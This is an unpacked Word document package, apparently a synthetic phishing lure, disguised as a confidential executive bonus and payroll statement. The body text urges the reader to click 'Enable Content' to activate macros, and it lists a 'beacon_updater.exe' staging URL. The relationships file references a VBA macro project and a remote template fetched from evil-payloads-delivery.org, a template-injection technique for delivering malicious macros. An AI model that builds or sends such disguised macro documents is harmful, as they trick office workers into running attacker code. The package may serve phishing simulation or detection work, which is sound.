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openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
  <Override PartName="/word/vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/>
  <Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/>
  <Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-package.extended-properties+xml"/>
  <Override PartName="/docProps/custom.xml" ContentType="application/vnd.openxmlformats-package.custom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</file>

<file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:body>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:color w:val="1A365D"/>
        </w:rPr>
        <w:t>GLOBAL FINANCIAL SOLUTIONS &amp; AUDIT CORP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:color w:val="718096"/>
        </w:rPr>
        <w:t>Quarterly Executive Bonus &amp; Compensation Reconciliation Statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF5F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C53030"/>
        </w:rPr>
        <w:t>[STRICTLY CONFIDENTIAL - AUTHORIZED EXECUTIVE DISBURSEMENT ONLY]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFD0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="B7791F"/>
        </w:rPr>
        <w:t>SECURITY NOTICE: This document was encrypted using Microsoft Information Protection (MIP). Click 'Enable Content' on the yellow bar above to activate the automated calculation macros and view live payroll disbursements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Target Recipient: John Doe &lt;jdoe@target.local&gt; | Workstation: WKSTN-FIN-01 (10.0.4.15)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Audit Reference: #INV-2026-994 | Target Domain: TARGET.LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Remote Staging Verification: http://evil-payloads-delivery.org/beacon_updater.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Payload Verification Hash (SHA-256): fbfd5b9863d0e6acf98c420c3d2e301a830f42e8fee7d94809ea9bffdf755972</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Disbursement Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Period Basis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Gross Amount (USD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:t>Executive Variable Incentive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t>FY2026 - Q3 Target (114%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t>$245,000.00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:t>Divisional Retained Bonus Pool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t>Milestone Approved</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t>$180,000.00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:t>Discretionary Management Award</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t>Board Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t>$85,500.00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>TOTAL NET DISBURSEMENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>$510,500.00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Certified by: Robert Vance (Chief Financial Officer) &amp; Jonathan Vance (CEO)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:i/>
        <w:t>Direct Deposit Wire Instructions will execute to Chase Bank account ending in 4419.</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://evil-payloads-delivery.org/templates/financial_macro_v2.dotm" TargetMode="External"/>
</Relationships>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties">
  <Application>Microsoft Office Word</Application>
  <AppVersion>16.0000</AppVersion>
  <Company>Global Financial Solutions LLC</Company>
  <Manager>Marcus Vance</Manager>
  <Pages>3</Pages>
  <Words>742</Words>
  <Characters>4810</Characters>
  <Lines>48</Lines>
  <Paragraphs>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Q3 Executive Financial Compensation &amp; Bonus Schedule</dc:title>
  <dc:subject>Executive Compensation &amp; Payroll Reconciliation</dc:subject>
  <dc:creator>Robert Vance (Chief Financial Officer)</dc:creator>
  <cp:keywords>Payroll, Executive, Q3, Confidential, Bonus, Wire Transfer</cp:keywords>
  <dc:description>Quarterly certified executive bonus calculation ledger and wire instructions.</dc:description>
  <cp:lastModifiedBy>jdoe</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-09T14:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-10T10:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties">
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="2" name="ConfidentialityLevel">
    <vt:lpwstr xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">Strictly Confidential - Internal Only</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="DocumentID">
    <vt:lpwstr xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">GFS-FIN-2026-Q3-00994</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="TargetAudience">
    <vt:lpwstr xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">jdoe@target.local</vt:lpwstr>
  </property>
</Properties>
</file>